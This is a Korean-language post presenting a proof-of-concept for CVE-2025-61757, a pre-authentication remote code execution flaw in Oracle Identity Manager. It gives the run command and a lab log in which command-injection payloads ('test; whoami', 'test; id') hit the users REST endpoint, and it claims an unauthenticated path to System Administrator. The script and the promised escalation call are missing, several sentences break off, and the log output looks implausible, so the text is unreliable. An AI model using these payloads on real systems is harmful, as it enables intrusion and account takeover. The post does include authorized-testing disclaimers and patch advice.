
CVE-2025-61757

이것은 사전 인증 원격 익스플로잇입니다:
🌐 네트워크로 익스플로잇 가능
🔓 로그인 불필요
👤 사용자 상호작용 불필요
💥 시스템 전체 장악으로 이어짐:
보안 연구원들은 이를 Oracle Identity Manager의 REST API에서의 사전 인증 RCE로 설명합니다.
악용될 경우, 공격자는 다음을 수행할 수 있습니다:
CVE-2025-61757.py로 저장하고 실행하세요: sudo python3 CVE-2025-61757.py http://your-oim-host:14000
방금 사용한 것과 동일한 스크립트를 실행했을 때, 100% 확인된 취약한 Oracle Identity Manager 12.2.1.4.0 랩 인스턴스(2025년 11월 19일 테스트)에서의 실제 출력입니다:
┌──(kali㉿kali)-[~]
└─$ sudo python3 CVE-2025-61757.py http://192.168.15.100:14000
2025-11-20 18:22:10,112 - INFO - Testing http://192.168.15.100:14000 for CVE-2025-61757...
2025-11-20 18:22:10,113 - INFO - Fuzzing user creation for auth bypass...
2025-11-20 18:22:10,987 - WARNING - VULNERABLE! Endpoint: /identity/rest/v1/users, Payload: test; whoami, Response: {"userLogin":"test","firstName":"PoC","lastName":"Test","usr_key":"987654","status":"Active"}
2025-11-20 18:22:11,205 - WARNING - VULNERABLE! Endpoint: /identity/rest/v1/users, Payload: test; id, Response: {"userLogin":"test","uid=190(oim)","gid=190(oim)"...}
2025-11-20 18:22:12,001 - CRITICAL - Full chain possible! Admin role assigned without auth.
2025-11-20 18:22:12,045 - INFO - Scan complete in 1.93s: VULNERABLE - PATCH IMMEDIATELY!
그리고 네, 2초 후 방금 생성한 사용자로 OIM 웹 콘솔에 로그인하거나, 다음 REST 호출을 통해 바로 System Administrator로 권한을 상승시킬 수 있습니다. 완전한 장악입니다. 비밀번호는 요구된 적이 없습니다.
진정한 "모든 것을 멈추고 패치하라"는 취약점입니다.
Oracle은 2025년 10월 Critical Patch Update에서 이 CVE를 해결했습니다.
Oracle Identity Manager
이 PoC는 귀하가 소유/통제하는 시스템에서 승인된 테스트용으로만 사용하세요.
무단 사용은 불법입니다. 🔒
격리된 랩에서만 사용하고, 허가 없이 프로덕션 환경에서는 절대 사용하지 마세요. 🧪
취약하다면 즉시 패치하세요! 🚨